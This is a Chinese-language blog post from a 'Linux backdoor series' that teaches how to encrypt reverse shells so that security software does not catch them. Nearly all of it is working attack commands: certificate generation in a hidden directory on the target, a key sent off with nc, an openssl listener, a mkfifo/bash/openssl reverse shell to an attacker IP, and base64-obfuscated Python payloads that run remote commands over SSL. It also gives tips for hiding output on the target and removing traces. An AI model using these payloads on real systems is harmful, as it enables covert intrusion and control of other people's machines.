shell 加密传输 | Linux后门系列
之前提到的所有的反弹shell的方法都有一个共同的缺点:明文传输
我们传输的命令不被安全软件拦截才怪
本来我是打算base64编码进行测试的,但是失败了,这里有个问题需要以后去深究,这里仅仅抛出来
nc 192.168.1.38 5555 | bin/bash 可以实现攻击机一条一条执行命令而shell不断
nc 192.168.1.38 5555 | base64 只有在nc连接断掉的时候才会执行
没有搞懂因为什么,所以暂时放弃用管道符来加密nc了
【 openssl 】
ubuntu 16.04 默认自带 openssl ,我们可以使用 openssl 来加密我们的流量,我只是了解 https 工作流程,如何打包,如何传输,但是对于内部使用的算法怎么算的不是很理解,所以今天特意买了两本书看一看,过一段时间就会到了,不过不影响 openssl 加密我们的流量
这次的加密在某一些层面违背了我之前的原则——不新建文件、不安装软件、不装新模块
在目标主机找一个比较隐蔽的目录,生成我们的证书公私钥
bash openssl req -x509 -newkey rsa:4096 -keyout .key.pem -out .cert.pem -days 365 -nodes
将这两个文件复制到我们的攻击机上
我一般都喜欢 python3 -m http.server 9000 来开启一个web服务进行下载,但是这样似乎动静太大了,安全软件不干掉我们都对不起他自己
所以我们使用nc 来进行传输
[+] 攻击机
nc -l 5555 > key.pem
[-] 目标主机
nc -q 1 192.168.1.38 5555 < .key.pem
可以看到成功下载到了攻击机
攻击机上使用生成的公私钥执行openssl的监听
bash openssl s_server -quiet -key key.pem -cert cert.pem -port 5555
目标主机执行加密反弹
bash rm -f /tmp/f ; mkfifo /tmp/f ; /bin/bash -i < /tmp/f 2>&1|openssl s_client -quiet -connect 192.168.1.38:5555 > /tmp/f;rm /tmp/f
可以看到,成功反弹shell(连接的过程时间很长,耐心等待)
打开Wireshark 来进行抓包,看看咱们的流量是不是真的加密了
可以看到使用了 TLSv1.2 传输,加密效果应该是杠杠的!
tips:
上面命令还是在目标主机上打印了一些信息,我们可以将命令改为
rm -f /tmp/f ; mkfifo /tmp/f ; /bin/bash -i < /tmp/f 2>&1|openssl s_client -quiet -connect 192.168.1.38:5555 &> /tmp/f;rm /tmp/f反弹shell过程中,目标主机上生成的公私钥文件传到攻击机后记得删掉,避免多余的麻烦
上面的都是看了网上文章总结出的方法,不过我隐隐约约觉得哪里不对劲,我为什么要在目标主机上生成公私钥再传输到攻击机上???
差点被自己蠢哭,直接在攻击机上生成不就好了???
攻击机上生成公私钥(mac上不能生成空的密钥文件,需要填写数据)
配置监听和反弹shell
成功反弹shell,肯定是最近熬夜多了,脑子不灵光了
【 python3 】
除了 openssl 工具来进行加密连接,我还有其他的招,没错就是 python3 , 既然 python3 可以使用 -c 参数加载任意代码,我们就直接在代码中使用ssl库加密流量就好了
msf 安排上
python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMS4zOCcsNTU1NSkpCnM9c3NsLndyYXBfc29ja2V0KHNvKQp3Wj1GYWxzZQp3aGlsZSBub3Qgd1o6CglkYXRhPXMucmVjdigxMDI0KQoJaWYgbGVuKGRhdGEpPT0wOgoJCXdaID0gVHJ1ZQoJcHJvYz1zdWJwcm9jZXNzLlBvcGVuKGRhdGEsc2hlbGw9VHJ1ZSxzdGRvdXQ9c3VicHJvY2Vzcy5QSVBFLHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsc3RkaW49c3VicHJvY2Vzcy5QSVBFKQoJc3Rkb3V0X3ZhbHVlPXByb2Muc3Rkb3V0LnJlYWQoKSArIHByb2Muc3RkZXJyLnJlYWQoKQoJcy5zZW5kKHN0ZG91dF92YWx1ZSkK'.decode('base64'))" >/dev/null 2>&1 &
把 python 换成 python3,监听执行一下
可以看到,反弹shell失败了,错误消息都被重定向到 /dev/null 了,我们把它去掉,看看报什么错误
报错原因是 str没有decode这个方法,很明显,是因为 Python 3 中str 对象没有decode方法了,所以我们变型,结合之前我们的 python3 反弹shell的 payload
python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMS4zOCcsNTU1NSkpCnM9c3NsLndyYXBfc29ja2V0KHNvKQp3Wj1GYWxzZQp3aGlsZSBub3Qgd1o6CglkYXRhPXMucmVjdigxMDI0KQoJaWYgbGVuKGRhdGEpPT0wOgoJCXdaID0gVHJ1ZQoJcHJvYz1zdWJwcm9jZXNzLlBvcGVuKGRhdGEsc2hlbGw9VHJ1ZSxzdGRvdXQ9c3VicHJvY2Vzcy5QSVBFLHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsc3RkaW49c3VicHJvY2Vzcy5QSVBFKQoJc3Rkb3V0X3ZhbHVlPXByb2Muc3Rkb3V0LnJlYWQoKSArIHByb2Muc3RkZXJyLnJlYWQoKQoJcy5zZW5kKHN0ZG91dF92YWx1ZSkK')))"
继续监听执行
成功反弹shell并执行,抓包看一下
可以看到,传输采用的也是 TLSv1.2
往期文章
python3 反弹shell & 隐藏后门 | Linux 后门系列
dash & rbash & nc.openbsd | Linux 后门系列